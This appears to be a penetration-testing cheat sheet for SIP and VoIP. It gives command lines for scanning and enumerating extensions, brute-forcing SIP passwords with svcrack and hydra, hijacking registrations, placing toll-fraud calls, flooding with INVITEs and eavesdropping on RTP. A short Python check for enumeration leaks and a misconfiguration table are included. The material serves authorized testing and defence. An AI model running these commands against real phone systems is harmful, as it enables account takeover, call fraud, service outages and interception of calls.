SIP and VoIP

Default Ports: 5060 (SIP), 5061 (SIP over TLS)

SIP is used by VoIP phones, PBXs, trunks, and call platforms. In pentests, SIP can expose extensions, weak phone credentials, call routing abuse, voicemail access, and PBX management weaknesses.

Connect

Using SIPVicious

SIPVicious is commonly used for SIP scanning and extension enumeration.

svmap target.com
svwar -m INVITE target.com
svwar -m REGISTER target.com

Using sipsak

sipsak sends SIP requests and checks server behavior.

sipsak -s sip:target.com
sipsak -vv -s sip:1000@target.com
sipsak -U -s sip:target.com

Using Linphone

A SIP softphone validates registration and call behavior with approved accounts.

linphonec
register sip:1000@target.com target.com password
call sip:1001@target.com

Using TLS

SIP over TLS should be checked for certificate and protocol issues.

openssl s_client -connect target.com:5061 -servername target.com
nmap -p 5061 --script ssl-cert,ssl-enum-ciphers target.com

Recon

Service Detection with Nmap

Scan UDP, TCP, and TLS SIP ports.

nmap -sU -sT -p 5060,5061 -sV target.com
nmap -sU -p 5060 --script sip-methods,sip-enum-users target.com
nmap -p 5061 --script ssl-cert,ssl-enum-ciphers target.com

SIP Method Discovery

Allowed methods reveal proxy, registrar, and PBX behavior.

nmap -sU -p 5060 --script sip-methods target.com
sipsak -vv -s sip:target.com

PBX Fingerprinting

Headers and error messages often reveal Asterisk, FreePBX, Kamailio, or Cisco systems.

svmap target.com
sipsak -vv -s sip:invalid@target.com

Enumeration

Extension Enumeration

Extension enumeration identifies valid users, phones, and voicemail targets.

svwar -m REGISTER -e1000-9999 target.com
svwar -m INVITE -e1000-9999 target.com
svwar -m OPTIONS -e1000-9999 target.com

Registration Check

Registration behavior can reveal valid extensions and authentication responses.

sipsak -vv -s sip:1000@target.com
sipsak -vv -s sip:9999@target.com
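
The comparison behind the two probes above, as an added Python example that is not part of the original page: it parses the reply for a known-valid and a known-invalid extension and reports whether the registrar answers them differently, along with the banner it discloses. The sample responses, the "ExamplePBX" banner, and all function names are constructed for illustration.

```python
# Added example: do a registrar's replies distinguish real extensions from fake ones?
# All SIP messages below are constructed sample data; "ExamplePBX" is hypothetical.

def sample_response(code, reason, ext, challenge):
    """Build a constructed SIP reply to a REGISTER for `ext`."""
    lines = [
        f"SIP/2.0 {code} {reason}",
        "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK-constructed",
        f"To: <sip:{ext}@target.com>;tag=constructed",
        "CSeq: 1 REGISTER",
        "Server: ExamplePBX 1.0",
    ]
    if challenge:
        lines.append('WWW-Authenticate: Digest realm="pbx", nonce="constructed"')
    return "\r\n".join(lines) + "\r\n\r\n"

def parse_sip_response(raw):
    """Return (status_code, headers) for a raw SIP response; header names lowercased."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    parts = head[0].split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("SIP/") or not parts[1].isdigit():
        raise ValueError(f"not a SIP status line: {head[0]!r}")
    headers = {}
    for line in head[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return int(parts[1]), headers

def profile(raw):
    """Reduce a response to the fields a client could use to tell extensions apart."""
    status, headers = parse_sip_response(raw)
    challenged = "www-authenticate" in headers or "proxy-authenticate" in headers
    return {"status": status, "auth_challenge": challenged,
            "banner": headers.get("server") or headers.get("user-agent")}

def review(valid_raw, invalid_raw):
    """Compare replies for a known-valid and a known-invalid extension."""
    valid, invalid = profile(valid_raw), profile(invalid_raw)
    leaks = [k for k in ("status", "auth_challenge") if valid[k] != invalid[k]]
    return {"enumerable": bool(leaks), "differs_in": leaks, "banner": valid["banner"]}

if __name__ == "__main__":
    leaky = review(sample_response(401, "Unauthorized", 1000, True),
                   sample_response(404, "Not Found", 9999, False))
    uniform = review(sample_response(401, "Unauthorized", 1000, True),
                     sample_response(401, "Unauthorized", 9999, True))
    print("leaky registrar:  ", leaky)
    print("uniform registrar:", uniform)
```

A registrar that returns the same status and challenge for both probes gives enumeration nothing to work with; on Asterisk chan_sip, alwaysauthreject=yes is the setting intended to produce that behavior.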

User and Trunk Discovery

Look for predictable extension ranges and trunk usernames.

svwar -d extensions.txt target.com
svwar -d users.txt -m REGISTER target.com

RTP Discovery

RTP media ranges may expose audio streams if not protected.

nmap -sU -p 10000-20000 target.com
rtpbreak -i eth0

Attack Vectors

Weak SIP Credentials

SIP phones often use numeric extensions and weak PIN-style passwords.

svcrack -u 1000 -d passwords.txt target.com
hydra -s 5060 -L users.txt -P passwords.txt target.com sip

Registration Hijacking

Valid SIP credentials can register a softphone as another extension.

linphonec
register sip:1000@target.com target.com password

Toll Fraud

Authenticated SIP access may allow outbound call abuse.

sipsak -s sip:+15551234567@target.com -a password -U -f invite.txt

Voicemail Access

Voicemail systems often use weak PINs or extension-based defaults.

svwar -d voicemail-extensions.txt target.com

SIP Invite Flooding

DoS tests must be explicitly scoped because voice systems are sensitive.

inviteflood eth0 target.com 1000 target.com 100

RTP Eavesdropping

Unencrypted RTP may expose call audio on local networks.

rtpbreak -i eth0
wireshark

Post-Exploitation

Call Path Review

Document reachable extensions, trunks, and dial patterns.

svwar -m REGISTER -e1000-9999 target.com > sip-extensions.txt
grep -Ei 'trunk|outbound|international|voicemail' sip-extensions.txt

Credential Reuse Check

Validate whether SIP credentials work on PBX portals or voicemail.

netexec http target.com -u users.txt -p passwords.txt

Evidence Collection

Collect banners, valid extensions, and scoped authentication evidence.

svmap target.com > sip-map.txt
svwar -m REGISTER -e1000-9999 target.com > sip-users.txt

Useful Tools

| Tool | Purpose |
| --- | --- |
| sipvicious | SIP scanning and brute force |
| sipsak | SIP request testing |
| nmap | SIP service detection |
| linphonec | Softphone testing |
| hydra | Credential testing |
| rtpbreak | RTP capture analysis |
| Wireshark | SIP/RTP packet analysis |

Security Misconfigurations

| Misconfiguration | Risk |
| --- | --- |
| Extension enumeration | User and phone discovery |
| Weak SIP passwords | Registration hijacking |
| Exposed PBX | Voice infrastructure attack surface |
| Unrestricted outbound calls | Toll fraud |
| Weak voicemail PINs | Voicemail compromise |
| Unencrypted RTP | Call audio exposure |
| SIP over UDP exposed broadly | Brute force and scanning risk |